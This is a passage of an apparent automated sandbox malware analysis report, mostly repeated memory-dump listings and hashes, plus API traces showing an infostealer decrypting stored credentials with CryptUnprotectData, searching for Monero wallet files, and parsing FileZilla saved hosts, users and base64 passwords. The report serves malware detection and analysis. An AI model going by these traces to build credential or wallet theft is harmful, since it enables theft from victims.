                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 287cb20d6307de5979b8d53c9d4e4dc4f414a0d6f1184e07f495e15e61c83f02
                              • Instruction ID: 821665f30b353f1e57d2503bd73bde8b52fa0e330f1bb384f29786abfd47d053
                              • Opcode Fuzzy Hash: 287cb20d6307de5979b8d53c9d4e4dc4f414a0d6f1184e07f495e15e61c83f02
                              • Instruction Fuzzy Hash: 1641E970A40A289FDB24DB58CC95F9BB7B5BB58702F4082D8E618E72D0D771AE85CF50
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 001B9B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 001B9BA3
                              • LocalFree.KERNEL32(?), ref: 001B9BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 02e93d222d0e7a5aaf27e62783644c358ca561a36fb3dc33252f36c589374ea4
                              • Instruction ID: dc8a8d0d108adfccc7b74891cd146862bdda3b3e93c542138b4d382a2ac98128
                              • Opcode Fuzzy Hash: 02e93d222d0e7a5aaf27e62783644c358ca561a36fb3dc33252f36c589374ea4
                              • Instruction Fuzzy Hash: F911BAB4A00209DFDB05DFA4D985EAE77B9FF88300F104568E91597350D774AE11CF61
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: _ph$yXW
                              • API String ID: 0-2400651086
                              • Opcode ID: e3c7ece6a3a80bd0a3ce7284d8f08eaae1eaa4283a976b8ef5ff089c7352ab4a
                              • Instruction ID: a34cae168c8a267cc0b54430ff76acb54e1ad2fdc495190205d87370cb40f74f
                              • Opcode Fuzzy Hash: e3c7ece6a3a80bd0a3ce7284d8f08eaae1eaa4283a976b8ef5ff089c7352ab4a
                              • Instruction Fuzzy Hash: 2E421BF3A0C2049FE3046E2DEC8567AF7E9EF94720F164A3DEAC4C3744E93599058696
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001D15B8,001D0D96), ref: 001BF71E
                              • StrCmpCA.SHLWAPI(?,001D15BC), ref: 001BF76F
                              • StrCmpCA.SHLWAPI(?,001D15C0), ref: 001BF785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001BFAB1
                              • FindClose.KERNEL32(000000FF), ref: 001BFAC3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: a88b6641531f37e2192742d09cec6bd49b365e8aaeb3368c6c4b309dc5f8ac59
                              • Instruction ID: 15c0cb8829528a3d581c7b3a5bc66f1f40550c6542dfc6e22d1afb1c3b08ccb1
                              • Opcode Fuzzy Hash: a88b6641531f37e2192742d09cec6bd49b365e8aaeb3368c6c4b309dc5f8ac59
                              • Instruction Fuzzy Hash: 4911787184010D6BDB15EB60DC55FED7378AF30304F8042ADE51A57492EF306B4ACB52
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: #%m
                              • API String ID: 0-464343836
                              • Opcode ID: c98f4e1c7eb29303c02179b8c3e959a75b7c0c155b781da1578fe59851834a2e
                              • Instruction ID: f43de9c9ff12a5a74990b8c30779b10442358902100c1df54a6f757bc1f51aff
                              • Opcode Fuzzy Hash: c98f4e1c7eb29303c02179b8c3e959a75b7c0c155b781da1578fe59851834a2e
                              • Instruction Fuzzy Hash: D32121B251C2109FE359FE58D881A6AF7E5FF58310F16092DEBD5C3350D63168108B97
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b54150de800332754fddfc1c51f30082321bfbf448099f900d434480aa75c748
                              • Instruction ID: 9e34c51a7b900737254dd48307a956dab08a5aa599e5cec272d3eb1f24e58245
                              • Opcode Fuzzy Hash: b54150de800332754fddfc1c51f30082321bfbf448099f900d434480aa75c748
                              • Instruction Fuzzy Hash: A0512BF3D082105BF318AE2DDC95776B7D6EB54320F1B463DEA8997B84E93969008286
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6442d70e482c7efa2fc58bd0c4eead74c05dabb3681b7f752347058778564a98
                              • Instruction ID: 043302bbaca6d05f92a036686433bd578094227c291db5b5c71749555301430d
                              • Opcode Fuzzy Hash: 6442d70e482c7efa2fc58bd0c4eead74c05dabb3681b7f752347058778564a98
                              • Instruction Fuzzy Hash: F551B5F3A082005FE7106E6DEC9176AF7E5EB98720F1A453DEBC4D3780E9395C014696
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4fe924137f374b5a00439f020506bbd6af8ef4f33eb4ac030033f046b5bb6032
                              • Instruction ID: 566d85085b4bb7d78347c2992a4446f7ecd1a611aceeb7cc27d66e05bed56555
                              • Opcode Fuzzy Hash: 4fe924137f374b5a00439f020506bbd6af8ef4f33eb4ac030033f046b5bb6032
                              • Instruction Fuzzy Hash: 0241F4F3E086108FE7449E78DD8572AB7E2EB94310F1A853CDAC993384E9395C048686
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                               • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 94b357c5a0389a6fc0dad0aa1018adce0780d67ef4106b319a00b342cf1f27df
                              • Instruction ID: cc3d4080b4e96d1be053d1d8e3630ccb6fec8057d43c8004155b112d273c81e3
                              • Opcode Fuzzy Hash: 94b357c5a0389a6fc0dad0aa1018adce0780d67ef4106b319a00b342cf1f27df
                              • Instruction Fuzzy Hash: BD413CB3A0C2006BE34C5E2CDC5677AB7E9EF94360F1A452EE6C9D7780D5795C018786
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                               • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 08433f62c14d34ac1d106fcd67894395327e9fe7dad703823113e464eaae46ee
                              • Instruction ID: 1c348c12d7c861878d57c750f0cdc1833f40c4609d2024c9876d77afba710dac
                              • Opcode Fuzzy Hash: 08433f62c14d34ac1d106fcd67894395327e9fe7dad703823113e464eaae46ee
                              • Instruction Fuzzy Hash: FF4157B3E042109BF3141929EC9577ABA9ADB90320F2A463DDA88A7780E97D5C0183C5
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                               • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 99c3b818f71b267c9a579a4bf73533b808377394ee4089b25b406d9498a62807
                              • Instruction ID: 9869daf6a76aaa0bc6422482783687aa7b6a7d07f6096b0a30c95deeff5c3db3
                              • Opcode Fuzzy Hash: 99c3b818f71b267c9a579a4bf73533b808377394ee4089b25b406d9498a62807
                              • Instruction Fuzzy Hash: C63195F3908210AFE314EF19D88576FBBD5EF94720F06893DEAC997640D2356C508AD2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                               • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001C8E0B
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                                • Part of subcall function 001B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001B99EC
                                • Part of subcall function 001B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001B9A11
                                • Part of subcall function 001B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001B9A31
                                • Part of subcall function 001B99C0: ReadFile.KERNEL32(000000FF,?,00000000,001B148F,00000000), ref: 001B9A5A
                                • Part of subcall function 001B99C0: LocalFree.KERNEL32(001B148F), ref: 001B9A90
                                • Part of subcall function 001B99C0: CloseHandle.KERNEL32(000000FF), ref: 001B9A9A
                                • Part of subcall function 001C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001C8E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,001D0DBA,001D0DB7,001D0DB6,001D0DB3), ref: 001C0362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C0369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 001C0385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001D0DB2), ref: 001C0393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 001C03CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001D0DB2), ref: 001C03DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 001C0419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001D0DB2), ref: 001C0427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 001C0463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001D0DB2), ref: 001C0475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001D0DB2), ref: 001C0502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001D0DB2), ref: 001C051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001D0DB2), ref: 001C0532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001D0DB2), ref: 001C054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 001C0562
                              • lstrcat.KERNEL32(?,profile: null), ref: 001C0571
                              • lstrcat.KERNEL32(?,url: ), ref: 001C0580
                              • lstrcat.KERNEL32(?,00000000), ref: 001C0593
                              • lstrcat.KERNEL32(?,001D1678), ref: 001C05A2
                              • lstrcat.KERNEL32(?,00000000), ref: 001C05B5
                              • lstrcat.KERNEL32(?,001D167C), ref: 001C05C4
                              • lstrcat.KERNEL32(?,login: ), ref: 001C05D3
